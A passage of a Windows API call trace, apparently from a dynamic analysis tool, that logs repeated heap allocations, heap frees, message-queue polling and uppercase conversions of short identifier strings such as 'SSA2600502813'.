(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0100.326] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0100.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0100.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11fe4) returned 0x2a7a130 [0100.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0100.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0100.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0100.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0100.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0100.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0100.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11fe4) returned 0x37c0048 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0100.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0100.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0100.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0100.331] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0100.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0100.332] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0100.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0100.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0100.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0100.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0100.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0100.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0100.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0100.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0100.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0100.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0100.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0100.335] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.335] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0100.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0100.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0100.335] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0100.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0100.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0100.336] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0100.336] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0100.336] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0100.336] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0100.336] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0100.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0100.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0100.337] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0100.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0100.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0100.337] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.337] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0100.337] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.337] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.337] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0100.337] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0100.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.337] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd 